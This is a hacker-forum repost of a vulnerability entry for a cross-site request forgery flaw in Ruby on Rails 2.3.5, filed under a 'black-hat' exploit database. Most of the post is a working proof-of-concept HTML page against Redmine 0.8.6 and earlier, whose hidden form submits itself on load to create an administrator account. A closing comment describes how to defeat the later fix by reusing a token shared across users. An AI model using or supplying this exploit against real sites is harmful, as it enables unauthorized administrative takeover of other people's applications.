跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Ruby on Rails 2.3.5 - 'protect_from_forgery' Cross-Site Request Forgery

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
source: https://www.securityfocus.com/bid/37322/info

Ruby on Rails is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain administrative actions, gain unauthorized access to the affected application, or delete certain data. Other attacks are also possible. 

/**
*  Redmine <= 0.8.6 CSRF Add Admin User Exploit
*  Discovered by: p0deje (http://p0deje.blogspot.com)
*  Application: http://www.redmine.org/wiki/redmine/Download
*  SA: http://www.redmine.org/news/30
*  Date: 13.11.2009
*  Versions affected: <= 0.8.6
*  Description: this is a simple exploit which exploits CSRF vulnerability in Redmine, it creates user account with adminstartive rights
*/
 
<html>
<body>
    <form method=POST action="http://www.example.com/users/new">
       <input style="display: none" type="text" value="hacker" size="25" name="user[login]" id="user_login"/>
       <input style="display: none" type="text" value="hacker" size="30" name="user[firstname]" id="user_firstname"/>
       <input style="display: none" type="text" value="hacker" size="30" name="user[lastname]" id="user_lastname"/>
       <input style="display: none" type="text" value="[email protected]" size="30" name="user[mail]" id="user_mail"/>
       <input style="display: none" type="password" size="25" name="password" id="password" value="hacker" />
       <input style="display: none" type="password" size="25" name="password_confirmation" id="password_confirmation" value="hacker" />
       <input style="display: none" type="checkbox" value="1" name="user[admin]" id="user_admin"/>
       <input style="display: none" type="hidden" value="1" name="user[admin]"/>
       <input style="display: none" type="submit" value="Create" id="commit" name="commit" />
  </form>
  <script>document.getElementById("commit").click();</script>
</body>
</html>
 
/**
*  P.S. Actually, this vulnerability wasn&#039;t fixed in Redmine 0.8.7, because token was generated one time for all the pages and allthe users.
*  Thus, you can add POST data with token of any user and exploit will be working again
*/

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。